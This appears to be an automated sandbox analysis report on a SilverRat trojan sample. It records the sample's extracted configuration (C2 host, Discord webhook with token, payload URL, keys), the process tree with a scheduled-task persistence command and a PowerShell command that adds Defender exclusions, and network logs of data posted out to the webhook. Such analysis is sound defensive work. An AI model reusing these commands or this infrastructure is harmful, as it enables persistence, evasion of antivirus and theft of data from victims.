Analysis

  • max time kernel
    296s
  • max time network
    300s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    24/12/2024, 13:28 UTC

General

  • Target

    SilverClient.exe

  • Size

    41KB

  • MD5

    3952e9916c90e897f360c6a30467d862

  • SHA1

    860e5ce37398db429528ad2b5f96a3005c65f800

  • SHA256

    2da1d2b5a84b7124e6a121545e2a113c6fd3176ff6d97e555c422f6cdc9b96db

  • SHA512

    43525046bb5601991e18d59922790da01e378102f74bf970c07013f312a7309c146994117dcc35e000c3874dfacd4eefc6c68937800a41555279dafaae02d021

  • SSDEEP

    768:ZpDZ3iKNWP3In15M8w+HR9m1xRUHE9wVdzmgotSB6S/uQ8QrnxUFU:ZpMQQF+xeGk9Ng7oouQ8QxUFU

Malware Config

Extracted

Family

silverrat

Version

1.0.0.0

C2

japanese-cross.gl.at.ply.gg:5544

Mutex

SilverMutex_jafRtepbDn

Attributes
  • decrypted_key

    -|S.S.S|-

  • discord

    https://discord.com/api/webhooks/1321105847064989729/ZxyszSatMIHTaGAl4BDIJjfWgDi3NYjS9MKji0deomNAJsyovtZj3obV9ncoMRVjdmqc

  • key

    yy6zDjAUmbB09pKvo5Hhug==

  • key_x509

    ZEdBaGFTUkx2U3pvY0RSQ0J5dHNpUlVOVGNQbUF3

  • payload_url

    https://g.top4top.io/p_2522c7w8u1.png

  • reconnect_delay

    4

Signatures

  • SilverRat

    SilverRat is a trojan written in C#.

  • Silverrat family
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up the country code configured in the registry, likely for geofencing.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Uses the powershell.exe command.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\SilverClient.exe
    "C:\Users\Admin\AppData\Local\Temp\SilverClient.exe"
    1⤵
    • Checks computer location settings
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2204
    • C:\Windows\SYSTEM32\schtasks.exe
      "schtasks.exe" /query /TN SilverClient.exe
      2⤵
        PID:3620
      • C:\Windows\SYSTEM32\schtasks.exe
        "schtasks.exe" /Create /SC ONCE /TN "SilverClient.exe" /TR "C:\Users\Admin\AppData\Local\Temp\SilverClient.exe \"\SilverClient.exe\" /AsAdmin" /ST 00:01 /IT /F /RL HIGHEST
        2⤵
        • Scheduled Task/Job: Scheduled Task
        PID:4708
      • C:\Windows\SYSTEM32\schtasks.exe
        "schtasks.exe" /query /TN SilverClient.exe
        2⤵
          PID:1272
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionExtension exe,bat,dll,ps1;exit
          2⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3848

      Network

      • DNS discord.com (SilverClient.exe)
        Remote address: 8.8.8.8:53 (US)
        Request:  discord.com IN A
        Response: discord.com IN A 162.159.137.232
                  discord.com IN A 162.159.128.233
                  discord.com IN A 162.159.138.232
                  discord.com IN A 162.159.135.232
                  discord.com IN A 162.159.136.232
      • POST https://discord.com/api/webhooks/1321105847064989729/ZxyszSatMIHTaGAl4BDIJjfWgDi3NYjS9MKji0deomNAJsyovtZj3obV9ncoMRVjdmqc (SilverClient.exe)
        Remote address: 162.159.137.232:443 (US)
        Request
        POST /api/webhooks/1321105847064989729/ZxyszSatMIHTaGAl4BDIJjfWgDi3NYjS9MKji0deomNAJsyovtZj3obV9ncoMRVjdmqc HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        Host: discord.com
        Content-Length: 425
        Expect: 100-continue
        Connection: Keep-Alive
        Response
        HTTP/1.1 204 No Content
        Date: Tue, 24 Dec 2024 13:28:12 GMT
        Content-Type: text/html; charset=utf-8
        Connection: keep-alive
        Set-Cookie: __dcfduid=ec9f0b42c1fa11efba0606cb2c553994; Expires=Sun, 23-Dec-2029 13:28:12 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
        strict-transport-security: max-age=31536000; includeSubDomains; preload
        x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
        x-ratelimit-limit: 5
        x-ratelimit-remaining: 4
        x-ratelimit-reset: 1735046894
        x-ratelimit-reset-after: 1
        via: 1.1 google
        alt-svc: h3=":443"; ma=86400
        CF-Cache-Status: DYNAMIC
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7HBHA9raZNZJoB2SM%2F1Lh2AD8UtmCu02ygoi0THfwhxx2UNAxo1VI6MZe23r%2BaJn9fRLxZcSJHFQxH49qFqXvwuDnYJm4PIj%2BhWGK3v929V2DXf6rC823fEB8wx4"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        X-Content-Type-Options: nosniff
        Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
        Set-Cookie: __sdcfduid=ec9f0b42c1fa11efba0606cb2c553994b5ddfa76de555a321a8720994eaf23926af55e450b9fa70d9c525ab94e3d2985; Expires=Sun, 23-Dec-2029 13:28:12 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
        Set-Cookie: __cfruid=6dc3e1bb4fa8d57bc5897d2941085c51d2f9f2a1-1735046892; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
        Set-Cookie: _cfuvid=16ZmfOzuOmmxdRMgaBiyso4o4uEKUXx4A9c3912NpTk-1735046892805-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
        Server: cloudflare
        CF-RAY: 8f70eee6de56cd5c-LHR
      • DNS japanese-cross.gl.at.ply.gg (SilverClient.exe)
        Remote address: 8.8.8.8:53 (US)
        Request:  japanese-cross.gl.at.ply.gg IN A
        Response: japanese-cross.gl.at.ply.gg IN A 147.185.221.24
      • DNS 154.239.44.20.in-addr.arpa
        Remote address: 8.8.8.8:53 (US)
        Request:  154.239.44.20.in-addr.arpa IN PTR
        Response: (empty)
      • DNS 232.137.159.162.in-addr.arpa
        Remote address: 8.8.8.8:53 (US)
        Request:  232.137.159.162.in-addr.arpa IN PTR
        Response: (empty)
      • DNS 172.214.232.199.in-addr.arpa
        Remote address: 8.8.8.8:53 (US)
        Request:  172.214.232.199.in-addr.arpa IN PTR
        Response: (empty)
      • DNS 22.160.190.20.in-addr.arpa
        Remote address: 8.8.8.8:53 (US)
        Request:  22.160.190.20.in-addr.arpa IN PTR
        Response: (empty)
      • DNS 95.221.229.192.in-addr.arpa
        Remote address: 8.8.8.8:53 (US)
        Request:  95.221.229.192.in-addr.arpa IN PTR
        Response: (empty)
      • DNS 58.55.71.13.in-addr.arpa
        Remote address: 8.8.8.8:53 (US)
        Request:  58.55.71.13.in-addr.arpa IN PTR
        Response: (empty)
      • DNS 53.210.109.20.in-addr.arpa
        Remote address: 8.8.8.8:53 (US)
        Request:  53.210.109.20.in-addr.arpa IN PTR
        Response: (empty)
      • DNS 198.187.3.20.in-addr.arpa
        Remote address: 8.8.8.8:53 (US)
        Request:  198.187.3.20.in-addr.arpa IN PTR
        Response: (empty)
      • DNS 198.187.3.20.in-addr.arpa
        Remote address: 8.8.8.8:53 (US)
        Request:  198.187.3.20.in-addr.arpa IN PTR
        Response: (none recorded)
      • DNS 134.71.91.104.in-addr.arpa
        Remote address: 8.8.8.8:53 (US)
        Request:  134.71.91.104.in-addr.arpa IN PTR
        Response: 134.71.91.104.in-addr.arpa IN PTR a104-91-71-134.deploy.static.akamaitechnologies.com
      • DNS 43.229.111.52.in-addr.arpa
        Remote address: 8.8.8.8:53 (US)
        Request:  43.229.111.52.in-addr.arpa IN PTR
        Response: (empty)
      • DNS 26.73.42.20.in-addr.arpa
        Remote address: 8.8.8.8:53 (US)
        Request:  26.73.42.20.in-addr.arpa IN PTR
        Response: (empty)
      • 162.159.137.232:443
        https://discord.com/api/webhooks/1321105847064989729/ZxyszSatMIHTaGAl4BDIJjfWgDi3NYjS9MKji0deomNAJsyovtZj3obV9ncoMRVjdmqc
        tls, http
        SilverClient.exe
        1.5kB
        5.2kB
        11
        12

        HTTP Request

        POST https://discord.com/api/webhooks/1321105847064989729/ZxyszSatMIHTaGAl4BDIJjfWgDi3NYjS9MKji0deomNAJsyovtZj3obV9ncoMRVjdmqc

        HTTP Response

        204
      • 147.185.221.24:5544
        japanese-cross.gl.at.ply.gg
        SilverClient.exe
        260 B
        5
        (this entry appears 14 times with identical values)
      • 147.185.221.24:5544
        japanese-cross.gl.at.ply.gg
        SilverClient.exe
        156 B
        3
      • 8.8.8.8:53
        discord.com
        dns
        SilverClient.exe
        57 B
        137 B
        1
        1

        DNS Request

        discord.com

        DNS Response

        162.159.137.232
        162.159.128.233
        162.159.138.232
        162.159.135.232
        162.159.136.232

      • 8.8.8.8:53
        japanese-cross.gl.at.ply.gg
        dns
        SilverClient.exe
        73 B
        89 B
        1
        1

        DNS Request

        japanese-cross.gl.at.ply.gg

        DNS Response

        147.185.221.24

      • 8.8.8.8:53
        154.239.44.20.in-addr.arpa
        dns
        72 B
        158 B
        1
        1

        DNS Request

        154.239.44.20.in-addr.arpa

      • 8.8.8.8:53
        232.137.159.162.in-addr.arpa
        dns
        74 B
        136 B
        1
        1

        DNS Request

        232.137.159.162.in-addr.arpa

      • 8.8.8.8:53
        172.214.232.199.in-addr.arpa
        dns
        74 B
        128 B
        1
        1

        DNS Request

        172.214.232.199.in-addr.arpa

      • 8.8.8.8:53
        22.160.190.20.in-addr.arpa
        dns
        72 B
        158 B
        1
        1

        DNS Request

        22.160.190.20.in-addr.arpa

      • 8.8.8.8:53
        95.221.229.192.in-addr.arpa
        dns
        73 B
        144 B
        1
        1

        DNS Request

        95.221.229.192.in-addr.arpa

      • 8.8.8.8:53
        58.55.71.13.in-addr.arpa
        dns
        70 B
        144 B
        1
        1

        DNS Request

        58.55.71.13.in-addr.arpa

      • 8.8.8.8:53
        53.210.109.20.in-addr.arpa
        dns
        72 B
        158 B
        1
        1

        DNS Request

        53.210.109.20.in-addr.arpa

      • 8.8.8.8:53
        198.187.3.20.in-addr.arpa
        dns
        142 B
        157 B
        2
        1

        DNS Request

        198.187.3.20.in-addr.arpa

        DNS Request

        198.187.3.20.in-addr.arpa

      • 8.8.8.8:53
        134.71.91.104.in-addr.arpa
        dns
        72 B
        137 B
        1
        1

        DNS Request

        134.71.91.104.in-addr.arpa

      • 8.8.8.8:53
        43.229.111.52.in-addr.arpa
        dns
        72 B
        158 B
        1
        1

        DNS Request

        43.229.111.52.in-addr.arpa

      • 8.8.8.8:53
        26.73.42.20.in-addr.arpa
        dns
        70 B
        156 B
        1
        1

        DNS Request

        26.73.42.20.in-addr.arpa

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rhsgv1og.vzx.ps1

        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      • memory/2204-0-0x00007FFFFBD73000-0x00007FFFFBD75000-memory.dmp

        Filesize

        8KB

      • memory/2204-1-0x0000000000BD0000-0x0000000000BDE000-memory.dmp

        Filesize

        56KB

      • memory/2204-2-0x00007FFFFBD70000-0x00007FFFFC831000-memory.dmp

        Filesize

        10.8MB

      • memory/2204-15-0x00007FFFFBD73000-0x00007FFFFBD75000-memory.dmp

        Filesize

        8KB

      • memory/2204-16-0x00007FFFFBD70000-0x00007FFFFC831000-memory.dmp

        Filesize

        10.8MB

      • memory/3848-8-0x00000199FB400000-0x00000199FB422000-memory.dmp

        Filesize

        136KB
